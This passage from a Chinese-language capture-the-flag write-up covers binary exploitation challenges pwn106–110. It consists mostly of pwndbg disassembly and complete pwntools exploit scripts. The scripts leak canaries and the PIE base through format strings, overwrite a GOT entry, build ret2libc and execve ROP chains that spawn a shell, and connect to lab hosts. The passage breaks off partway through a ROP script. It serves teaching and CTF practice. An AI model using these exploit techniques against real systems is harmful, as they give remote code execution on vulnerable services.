'\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n RCX  0x7ffff7f95680 (__exit_funcs) \u2014\u25b8 0x7ffff7f97000 (initial) \u25c2\u2014 0\n RDX  0x7fffffffde68 \u2014\u25b8 0x7fffffffe1fb \u25c2\u2014 'COLORFGBG=15;0'\n RDI  1\n RSI  0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n R8   0x555555555380 (__libc_csu_fini) \u25c2\u2014 ret \n R9   0x7ffff7fcbc80 (_dl_fini) \u25c2\u2014 push rbp\n R10  0x7fffffffda80 \u25c2\u2014 0x800000\n R11  0x206\n R12  0\n R13  0x7fffffffde68 \u2014\u25b8 0x7fffffffe1fb \u25c2\u2014 'COLORFGBG=15;0'\n R14  0x7ffff7ffd000 (_rtld_global) \u2014\u25b8 0x7ffff7ffe310 \u2014\u25b8 0x555555554000 \u25c2\u2014 0x10102464c457f\n R15  0\n RBP  0x7fffffffdd40 \u25c2\u2014 1\n RSP  0x7fffffffdd40 \u25c2\u2014 1\n RIP  0x555555555242 (main+4) \u25c2\u2014 sub rsp, 0x60\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ DISASM \/ x86-64 \/ set emulate on ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u25ba 0x555555555242 &lt;main+4&gt;     sub    rsp, 0x60                    RSP =&gt; 0x7fffffffdce0 (0x7fffffffdd40 - 0x60)\n   0x555555555246 &lt;main+8&gt;     mov    rax, qword ptr fs:[0x28]     RAX, [0x7ffff7dab768] =&gt; 0x8d09028e828a9200\n   0x55555555524f &lt;main+17&gt;    mov    qword ptr [rbp - 8], rax     [0x7fffffffdd38] &lt;= 0x8d09028e828a9200\n   0x555555555253 &lt;main+21&gt;    xor    eax, eax                     EAX =&gt; 0\n   0x555555555255 &lt;main+23&gt;    mov    eax, 0                       EAX =&gt; 0\n   0x55555555525a &lt;main+28&gt;    call   setup                       &lt;setup&gt;\n \n   0x55555555525f &lt;main+33&gt;    mov    eax, 0       EAX =&gt; 0\n   0x555555555264 &lt;main+38&gt;    call   banner                      &lt;banner&gt;\n \n   0x555555555269 &lt;main+43&gt;    movabs rax, 0x5b5858587b4d4854         RAX =&gt; 0x5b5858587b4d4854 ('THM{XXX[')\n   0x555555555273 &lt;main+53&gt;    movabs rdx, 0x6465725f67616c66         RDX =&gt; 0x6465725f67616c66 ('flag_red')\n   0x55555555527d &lt;main+63&gt;    mov    qword ptr [rbp - 0x60], rax\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ STACK ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n00:0000\u2502 rbp rsp 0x7fffffffdd40 \u25c2\u2014 1\n01:0008\u2502+008     0x7fffffffdd48 \u2014\u25b8 0x7ffff7dd7ca8 (__libc_start_call_main+120) \u25c2\u2014 mov edi, eax\n02:0010\u2502+010     0x7fffffffdd50 \u2014\u25b8 0x7fffffffde40 \u2014\u25b8 0x7fffffffde48 \u25c2\u2014 0x38 \/* '8' *\/\n03:0018\u2502+018     0x7fffffffdd58 \u2014\u25b8 0x55555555523e (main) \u25c2\u2014 push rbp\n04:0020\u2502+020     0x7fffffffdd60 \u25c2\u2014 0x155554040\n05:0028\u2502+028     0x7fffffffdd68 \u2014\u25b8 0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n06:0030\u2502+030     0x7fffffffdd70 \u2014\u25b8 0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n07:0038\u2502+038     0x7fffffffdd78 \u25c2\u2014 0xd23b59c484279e34\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ BACKTRACE ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u25ba 0   0x555555555242 main+4\n   1   0x7ffff7dd7ca8 __libc_start_call_main+120\n   2   0x7ffff7dd7d65 __libc_start_main+133\n   3   0x5555555550ba _start+42\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\npwndbg&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\nr=remote('10.10.125.41',9006)\n#r=process('\/mnt\/d\/Users\/cheng\/Downloads\/pwn106-user-1644300441063.pwn106-user')\nr.recvlines(7)\n\nr.sendline(b\"%6$p,%7$p,%8$p,%9$p,%10$p,%11$p,%12$p\")\n\nr.recvline()\nresponse = r.recvline().decode().strip().replace('Thanks ', '').replace('0x','').split(',')\n\nfor i in range(7):\n    print(bytes.fromhex(response[i]).decode()[::-1],end='')\nprint()\nr.close()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 107 &#8211; Bypassing mitigations<\/h2>\n\n\n\n<p>\u9019\u984c\u4fdd\u8b77\u5168\u958b\uff0c\u4e00\u6a23\u6709 fmt &amp; bof \u4e14\u6709\u7d66\u53ef\u4ee5 RCE \u7684 function \u4f46\u9700\u8981 leak canary &amp; pie base<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x0000000000000992 &lt;+0&gt;:     push   rbp\n   0x0000000000000993 &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000996 &lt;+4&gt;:     sub    rsp,0x40\n   0x000000000000099a &lt;+8&gt;:     mov    rax,QWORD PTR fs:0x28\n   0x00000000000009a3 &lt;+17&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x00000000000009a7 &lt;+21&gt;:    xor    eax,eax\n   0x00000000000009a9 &lt;+23&gt;:    mov    eax,0x0\n   0x00000000000009ae &lt;+28&gt;:    call   0x88a &lt;setup&gt;\n   0x00000000000009b3 &lt;+33&gt;:    mov    eax,0x0\n   0x00000000000009b8 &lt;+38&gt;:    call   0x912 &lt;banner&gt;\n   0x00000000000009bd &lt;+43&gt;:    lea    rdi,[rip+0x2a4]        # 0xc68\n   0x00000000000009c4 &lt;+50&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009c9 &lt;+55&gt;:    lea    rdi,[rip+0x2b8]        # 0xc88\n   0x00000000000009d0 &lt;+62&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009d5 &lt;+67&gt;:    lea    rdi,[rip+0x2d4]        # 0xcb0\n   0x00000000000009dc &lt;+74&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009e1 &lt;+79&gt;:    lea    rdi,[rip+0x318]        # 0xd00\n   0x00000000000009e8 &lt;+86&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009ed &lt;+91&gt;:    lea    rdi,[rip+0x344]        # 0xd38\n   0x00000000000009f4 &lt;+98&gt;:    mov    eax,0x0\n   0x00000000000009f9 &lt;+103&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x00000000000009fe &lt;+108&gt;:   lea    rax,[rbp-0x40]\n   0x0000000000000a02 &lt;+112&gt;:   mov    edx,0x14\n   0x0000000000000a07 &lt;+117&gt;:   mov    rsi,rax\n   0x0000000000000a0a &lt;+120&gt;:   mov    edi,0x0\n   0x0000000000000a0f &lt;+125&gt;:   mov    eax,0x0\n   0x0000000000000a14 &lt;+130&gt;:   call   0x750 &lt;read@plt&gt;\n   0x0000000000000a19 &lt;+135&gt;:   lea    rdi,[rip+0x338]        # 0xd58\n   0x0000000000000a20 &lt;+142&gt;:   mov    eax,0x0\n   0x0000000000000a25 &lt;+147&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x0000000000000a2a &lt;+152&gt;:   lea    rax,[rbp-0x40]\n   0x0000000000000a2e &lt;+156&gt;:   mov    rdi,rax\n   0x0000000000000a31 &lt;+159&gt;:   mov    eax,0x0\n   0x0000000000000a36 &lt;+164&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x0000000000000a3b &lt;+169&gt;:   lea    rdi,[rip+0x346]        # 0xd88\n   0x0000000000000a42 &lt;+176&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x0000000000000a47 &lt;+181&gt;:   lea    rdi,[rip+0x36a]        # 0xdb8\n   0x0000000000000a4e &lt;+188&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x0000000000000a53 &lt;+193&gt;:   lea    rax,[rbp-0x20]\n   0x0000000000000a57 &lt;+197&gt;:   mov    edx,0x200\n   0x0000000000000a5c &lt;+202&gt;:   mov    rsi,rax\n   0x0000000000000a5f &lt;+205&gt;:   mov    edi,0x0\n   0x0000000000000a64 &lt;+210&gt;:   mov    eax,0x0\n   0x0000000000000a69 &lt;+215&gt;:   call   0x750 &lt;read@plt&gt;\n   0x0000000000000a6e &lt;+220&gt;:   nop\n   0x0000000000000a6f &lt;+221&gt;:   mov    rax,QWORD PTR [rbp-0x8]\n   0x0000000000000a73 &lt;+225&gt;:   xor    rax,QWORD PTR fs:0x28\n   0x0000000000000a7c &lt;+234&gt;:   je     0xa83 &lt;main+241&gt;\n   0x0000000000000a7e &lt;+236&gt;:   call   0x720 &lt;__stack_chk_fail@plt&gt;\n   0x0000000000000a83 &lt;+241&gt;:   leave\n   0x0000000000000a84 &lt;+242&gt;:   ret<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<p><strong>fuzzing<\/strong> <\/p>\n\n\n\n<p>canary \u7684\u7279\u8272\u662f 00 \u7d50\u5c3e\uff0c\u9019\u88e1\u6293\u5230\u7684\u4f4d\u7f6e\u662f 13 ; \u63a5\u8457\u627e main static offset \u662f 992 \u7d50\u5c3e\u7684\uff0clocal \u8dd1\u7684\u7d50\u679c\u662f 17\uff0c\u4f46 remote \u662f 19<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nfor i in range(6, 25):\n    #p = process('.\/pwn107-1644307530397.pwn107')\n    p=remote('10.48.178.31',9007)\n    p.sendlineafter(b\"streak? \", f\"%{i}$p\".encode())\n    p.recvuntil(b\"current streak: \")\n    print(f\"{i}: {p.recvline().strip().decode()}\")\n    p.close()<\/code><\/pre>\n\n\n\n<p><strong>exploit<\/strong><\/p>\n\n\n\n<p>\u7528 main \u7684\u4f4d\u7f6e\u53bb\u627e\uff0c\u6c42\u5f97 PIE base = runtime address &#8211; static offset ; \u4ee5\u53ca\u53d6\u5f97\u53ef\u4ee5 RCE function \u7684\u4f4d\u7f6e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; p main\n$1 = {&lt;text variable, no debug info&gt;} 0x555555400992 &lt;main&gt;\npwndbg&gt; p get_streak\n$2 = {&lt;text variable, no debug info&gt;} 0x55555540094c &lt;get_streak&gt;<\/code><\/pre>\n\n\n\n<p>\u5728\u7b2c\u4e8c\u6b21 read \u6642\uff0c\u539f\u8b8a\u6578\u5927\u5c0f\u662f 24 \u4f46\u662f\u53ef\u4ee5 read 0x200 \u5229\u7528\u6b64\u8655 overflow \uff0c\u518d\u52a0\u4e0a leak canary &amp; 8 bytes padding \u84cb\u904e rbp \uff0c\u63a5\u8457\u5728 ret \u7684\u5730\u65b9\u586b\u5165 RCE function <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\nio=remote('10.48.176.242',9007)\n#io=process('.\/pwn107-1644307530397.pwn107')\nio.recvlines(10)\nio.sendline(b'%13$p,%19$p')\nshell_offset=0x94d\nmain_offset=0x992\nio.recvline()\nio.recvuntil(b'Your current streak: ')\n\nleak = io.recvline().decode().strip().split(',')\ncanary = int(leak[0], 16)\nleakedpie = int(leak[1], 16)\n\nlog.success(f'canary {hex(canary)} , pie base {hex(leakedpie-main_offset)}')\ntarget=leakedpie-main_offset+shell_offset\nio.sendline(b'a'*24+p64(canary)+b'a'*8+p64(target))\n\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 108 &#8211; GOT overwrite<\/h2>\n\n\n\n<p>Partial RELRO &amp; No PIE \u4e14\u6709 RCE function holidays\uff0c\u89c0\u5bdf\u7a0b\u5f0f\u5f97\u77e5\u5728\u7b2c\u4e8c\u6b21\u8f38\u5165\u6642\u6709 fmt vuln \uff0c\u53ef\u4ee5\u5229\u7528\u7b2c\u4e00\u6b21\u8f38\u5165\u6642\u586b\u5165 holidays address \uff0c\u7b2c\u4e8c\u6b21\u8f38\u5165\u6642\u5229\u7528 fmt \u5c07 puts got \u6539\u6210 holidays address<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  char buf[32]; \/\/ [rsp+0h] [rbp-90h] BYREF\n  char format[104]; \/\/ [rsp+20h] [rbp-70h] BYREF\n  unsigned __int64 v7; \/\/ [rsp+88h] [rbp-8h]\n\n  v7 = __readfsqword(0x28u);\n  setup(argc, argv, envp);\n  banner();\n  puts(aThmUniversity);\n  puts(&amp;byte_402198);\n  printf(\"\\n=[Your name]: \");\n  read(0, buf, 0x12u);\n  printf(\"=[Your Reg No]: \");\n  read(0, format, 0x64u);\n  puts(\"\\n=[ STUDENT PROFILE ]=\");\n  printf(\"Name         : %s\", buf);\n  printf(\"Register no  : \");\n  printf(format);\n  printf(\"Institue     : THM\");\n  puts(\"\\nBranch       : B.E (Binary Exploitation)\\n\");\n  puts(\n    \"\\n\"\n    \"                    =[ EXAM SCHEDULE ]=                  \\n\"\n    \" --------------------------------------------------------\\n\"\n    \"|  Date     |           Exam               |    FN\/AN    |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 1\/2\/2022  |  PROGRAMMING IN ASSEMBLY     |     FN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 3\/2\/2022  |  DATA STRUCTURES             |     FN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 3\/2\/2022  |  RETURN ORIENTED PROGRAMMING |     AN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 7\/2\/2022  |  SCRIPTING WITH PYTHON       |     FN      |\\n\"\n    \" --------------------------------------------------------\");\n  return v7 - __readfsqword(0x28u);\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<p><strong>fuzzing<\/strong> <\/p>\n\n\n\n<p>fuzzing \u7d50\u679c %6$p %10$p \u7686\u53ef\u8b80\u53d6\u5230\u7b2c\u4e00\u6b21\u8f38\u5165\u6642\u7684 8 \u500b b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nfor i in range(6,25):\n    io=process('.\/pwn108-1644300489260.pwn108')\n    io.sendlineafter(b':',b'bbbbbbbb')\n    io.sendlineafter(b':',f'aaaaaaaa%{i}$p'.encode())\n    io.recvlines(3)\n    log.info(f\"{i} {io.recvline().split()[3]}\")<\/code><\/pre>\n\n\n\n<p><strong>exploit<\/strong><\/p>\n\n\n\n<p>\u5728 pwndbg \u627e\u5230 puts got &amp; holiday \u4f4d\u7f6e\u5f8c\uff0c\u900f\u904e %&lt;holidays&gt;c \u589e\u52a0 printf \u7684\u8f38\u51fa\u5b57\u5143\u8a08\u6578\uff0c\u518d\u5229\u7528 %6$lln \u5c07\u7d2f\u8a08\u503c\u5beb\u5165\u7b2c\u516d\u500b\u4f4d\u7f6e\u7684\u503c\u6240\u6307\u5411\u7684\u8a18\u61b6\u9ad4\u4f4d\u5740\uff0c\u4e5f\u5c31\u662f\u5c07\u7b2c\u4e00\u6b21\u8f38\u5165\u7684\u503c\u6240\u6307\u5411\u7684\u4f4d\u7f6e\u6539\u6210 holidays \u7684\u503c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\n#io=process('.\/pwn108-1644300489260.pwn108')\nio=remote('10.49.168.146',9008)\nputs_got=0x404018\nholidays=0x0040123b\n\nio.sendlineafter(b':',p64(puts_got))\nio.sendlineafter(b'No]:',b'%'+str(holidays).encode()+b'c%6$lln')\nio.interactive()<\/code><\/pre>\n\n\n\n<p><strong>script kiddie version <\/strong><\/p>\n\n\n\n<p>\u76f4\u63a5\u5229\u7528 fmtstr_payload \u5c07 puts got \u6539\u6210 holidays <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\ncontext.arch='amd64'\nio=process('.\/pwn108-1644300489260.pwn108')\nelf=ELF('.\/pwn108-1644300489260.pwn108')\n#io=remote('10.49.168.146',9008)\nputs_got=elf.got['puts']\nholidays=elf.symbols['holidays']\nio.sendlineafter(b':',b'a')\npayload=fmtstr_payload(10,{puts_got:holidays})\nio.sendlineafter(b'No]:',payload)\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 109 &#8211; Return to PLT<\/h2>\n\n\n\n<p>Partial RELRO &amp; No canary &amp; No PIE \u6709 gets \u53ef\u4ee5 overflow <\/p>\n\n\n\n<p>stage 1 : \u5c07 puts_got \u653e\u5165 rdi register , puts_plt call puts function print puts_got \u6307\u5411\u7684 real libc address , repeat 3 times leak puts got ,gets got , setvbuf got \u6709\u4e86\u9019\u4e9b\u5f8c\u5c31\u53ef\u4ee5\u5229\u7528 https:\/\/libc.rip\/ \u627e\u5230\u90a3\u96bb binary \u8dd1\u7684 libc \u662f\u5565<\/p>\n\n\n\n<p>stage 2 : \u6709\u4e86 libc \u5f8c\u5c31\u80fd\u6253 ret2libc \u4e86 , libc base = puts real libc addr &#8211; puts got offset , \u5148 overflow \u5f8c\u4e32 ROP <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000004011f2 &lt;+0&gt;:     endbr64\n   0x00000000004011f6 &lt;+4&gt;:     push   rbp\n   0x00000000004011f7 &lt;+5&gt;:     mov    rbp,rsp\n=&gt; 0x00000000004011fa &lt;+8&gt;:     sub    rsp,0x20\n   0x00000000004011fe &lt;+12&gt;:    mov    eax,0x0\n   0x0000000000401203 &lt;+17&gt;:    call   0x401176 &lt;setup&gt;\n   0x0000000000401208 &lt;+22&gt;:    mov    eax,0x0\n   0x000000000040120d &lt;+27&gt;:    call   0x4011db &lt;banner&gt;\n   0x0000000000401212 &lt;+32&gt;:    lea    rdi,[rip+0xf07]        # 0x402120                                                  \n   0x0000000000401219 &lt;+39&gt;:    call   0x401060 &lt;puts@plt&gt;\n   0x000000000040121e &lt;+44&gt;:    lea    rax,[rbp-0x20]\n   0x0000000000401222 &lt;+48&gt;:    mov    rdi,rax\n   0x0000000000401225 &lt;+51&gt;:    mov    eax,0x0\n   0x000000000040122a &lt;+56&gt;:    call   0x401070 &lt;gets@plt&gt;\n   0x000000000040122f &lt;+61&gt;:    nop\n   0x0000000000401230 &lt;+62&gt;:    leave\n   0x0000000000401231 &lt;+63&gt;:    ret\nEnd of assembler dump.<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#io=process('.\/pwn109-1644300507645.pwn109')\nlibc = ELF('.\/libc6_2.31-0ubuntu9.10_amd64.so')\n#elf=ELF('.\/pwn109-1644300507645.pwn109')\n#libc=elf.libc\nio=remote('10.48.149.194',9009)\npop_rdi_ret=0x004012a3\noffset=40\nputs_plt=0x0000000000401060\nputs_got=0x404018\ngets_got=0x404020\nsetvbuf_got=0x404028\nmain=0x4011f2\nret=0x0040101a\n\nio.recvlines(6)\n\nio.sendline(b'a'*offset+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(gets_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(setvbuf_got)+p64(puts_plt)+p64(main))\n\nputs_libc = u64(io.recv(6) + b'\\x00\\x00')\nlog.info(f'puts_libc: {hex(puts_libc)}')\n\ngets_libc=u64(io.recv(6) + b'\\x00\\x00')\nlog.info(f'gets_libc: {hex(gets_libc)}')\n\nsetvbuf_libc=u64(io.recv(6) + b'\\x00\\x00')\nlog.info(f'setvbuf_libc: {hex(setvbuf_libc)}')\n\nlibc_base=puts_libc - libc.symbols['puts']\nlog.info(f'libc_base: {hex(libc_base)}')\n\nsystem_addr = libc_base + libc.symbols['system']\nbin_sh_addr = libc_base + next(libc.search(b'\/bin\/sh'))\n\nio.sendline(b'a'*offset+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr))\nio.interactive()<\/code><\/pre>\n\n\n\n<p>with one_gadget<\/p>\n\n\n\n<p>\u61f6\u5f97\u4e32 ROP \uff0c\u76f4\u63a5\u7528 one_gadget \u627e\u4f4d\u7f6e + \u932f\u8aa4\u5617\u8a66\u6cd5\u770b\u54ea\u500b\u4f4d\u7f6e\u53ef\u4ee5 RCE<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n#io=process('.\/pwn109-1644300507645.pwn109')\nlibc = ELF('.\/libc6_2.31-0ubuntu9.10_amd64.so')\nelf=ELF('.\/pwn109-1644300507645.pwn109')\nrop=ROP(elf)\nio=remote('10.49.179.119',9009)\n\noffset=40\n\nputs_plt=elf.plt['puts']\nputs_got=elf.got['puts']\ngets_got=elf.got['gets']\nsetvbuf_got=elf.got['setvbuf']\nmain=elf.symbols['main']\npop_rdi_ret = rop.find_gadget(['pop rdi','ret'])[0]\nret = rop.find_gadget(['ret'])[0]\n\nio.recvlines(6)\n\nio.sendline(b'a'*offset+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(gets_got)+p64(puts_plt)+p64(pop_rdi_ret)+p64(setvbuf_got)+p64(puts_plt)+p64(main))\n\nputs_leak=u64(io.recv(6).ljust(8,b'\\x00'))\nlog.info(f'puts_leak : {hex(puts_leak)}')\n\ngets_leak=u64(io.recv(6).ljust(8,b'\\x00'))\nlog.info(f'gets_leak : {hex(gets_leak)}')\n\nsetvbuf_leak=u64(io.recv(6).ljust(8,b'\\x00'))\nlog.info(f'setvbuf_leak : {hex(setvbuf_leak)}')\n\nlibc_base=puts_leak - libc.symbols['puts']\nlog.info(f'libc_base : {hex(libc_base)}')\n\nshell=libc_base+0xe3b01\nio.sendline(b'a'*offset+p64(shell))\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 110 &#8211; Playing with ROP<\/h2>\n\n\n\n<p>\u7528 cyclic \u642d\u914d pwndbg \u7b97\u51fa offset \u662f 0x28 \uff0c \u642d\u914d\u4ee5\u4e0b\u5716\u7247\u4e32 ROP chain <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"130\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\" alt=\"\" class=\"wp-image-729\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-300x38.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-768x98.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1536x195.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png 1897w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nr=remote('10.10.162.17',9010)\n\npop_rdi=0x40191a\npop_rax=0x4497d7\npop_rsi=0x40f4de\npop_rdx=0x40181f\ndata_addr=0x4c00e0\nmov_rdx_to_rdi=0x4340a3\nsyscall_addr=0x4012d3\n\nr.sendline(b'a'*0x28+p64(pop_rdx)+b'\/bin\/sh\\x00'+p64(pop_rdi)+p64(data_addr)+p64(mov_rdx_to_rdi)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(pop_rax)+p64(59)+p64(syscall_addr))\n\nr.interactive()<\/code><\/pre>\n\n\n\n<p>script kiddie version<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">from pwn import *\nfrom struct import pack\n\nio=process('.\/pwn110-1644300525386.pwn110')\n\np = b''\n\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e0) # @ .data\np += pack('&lt;Q', 0x00000000004497d7) # pop rax ; ret\np += b'\/bin\/\/sh'\np += pack('&lt;Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x0000000000443e30) # xor rax, rax ; ret\np += pack('&lt;Q', 0x000000000047bcf5) # mov qword ptr [rsi], rax ; ret\np += pack('&lt;Q', 0x000000000040191a) # pop rdi ; ret\np += pack('&lt;Q', 0x00000000004c00e0) # @ .data\np += pack('&lt;Q', 0x000000000040f4de) # pop rsi ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x000000000040181f) # pop rdx ; ret\np += pack('&lt;Q', 0x00000000004c00e8) # @ .data + 8\np += pack('&lt;Q', 0x0000000000443e30) # xor rax, rax ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 